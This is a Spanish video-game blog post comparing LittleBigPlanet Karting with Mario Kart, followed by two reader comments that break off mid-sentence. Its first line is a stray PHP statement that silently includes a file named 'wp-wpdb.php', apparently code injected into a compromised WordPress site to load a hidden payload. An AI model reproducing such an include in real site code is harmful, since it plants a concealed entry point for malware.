if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Little Big Planet Karting VS Mario Kart – La Fortaleza de LeChuck

Little Big Planet Karting VS Mario Kart

Mario Kart es una de las sagas más fructuosas y valoradas en Nintendo, creciendo a partir de una original idea y bautizando un subgénero de conducción llamado por todos «Mario Kart». No es difícil pues, de que salgan juegos parecidos e incluso clones (aquí no hay patentes como en el hardware, supongo). El próximo lanzamiento de Sony con Little Big Planet Karting es uno de los competidores más serios que ha recibido la saga de Nintendo  y eso es muy bueno, porque trae algunas ideas interesantes que ya le han funcionado en el mundo de los plataformas.

A partir de ver el próximo video, he tenido una reflexión. Lo primero ya lo dije en el análisis del último Mario Kart, y lo mantengo, la saga no deja de ser una repetición desde el de Gamecube para cada nueva consola que Nintendo saca. Las ventas dicen que no se equivocan, obviamente tampoco han tenido mucha competencia en el género y siempre apetece «echarte un Mario Kart» en tu nueva consola. En Mario Kart Double Dash para Gamecube hubo un atisbo de hacer algo diferente con dos personajes en el mismo kart pero sin modo online tampoco tuvo buen recibimiento tal invento. La saga está muy estancada y ahí es donde entra Little Big Planet Karting.

Ya véis, tan solo en la Beta de Little Big Planet Karting ya han sido capaces de recrear los circuitos de Mario Kart con su completo editor. Soy de los que han pensado que un editor le quita carisma y buen hacer a los videojuegos (normalmente son de texturas planas y cuatro objetos para colocar a lo largo de un escenario), no soy muy de jugarlos, pero todo eso lo pensaba antes de ver un editor de niveles en la saga Little Big Planet, donde la libertad con la edición hace que ciertos niveles sean auténticas obras de arte de muchas horas de trabajo.

Llevar esa idea al «MarioKarteo» es darle un toque de aire fresco y dejar a los jugadores desatascar un género que no pretende, ni puede, ofrecer mucho más. Y si fuera por Nintendo, seguiríamos igual, comprando cada Mario Kart y divirtiéndonos practicamente de la misma forma que si desempolvamos nuestra Super Nintendo y su original Super Mario Kart. ¿Que opináis, sois de darle oportunidad a nuevas ideas o preferís el Mario Kart más clásico? Yo echo de menos la combinación de aventura y  karts de Diddy Kong Racing.

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

2 comentarios

  1. ahora si que si tendran que realizar alguna innovacion en mario kart , la competencia es lo que hace , desde que desaparecieron los karts de crash , nintendo ha dejado mario kart tal como esta . Ahora tal vez se lance a la piscina. Incluso tampoco estaria mal imitar a sega con su juego de carreras y utilizar a otras franquicias de nintendo en sus mario kart .

    Lo que esta claro es que

  2. Está claro que ya son muchos años de Mario Kart y se necesita un cambio, yo sin duda firmaría ya por un "Nintendo Kart", un Mario Kart a lo "Super Smash Bros Brawl y con editor de niveles.
    Y realmente Nintendo ya había hecho esto en el pasado, porque Excitebike o F-Zero X de 64DD ya llevaban un completo editor de niveles, por lo que tampoco sería nada nuevo por su parte. Pero

Dejar un comentario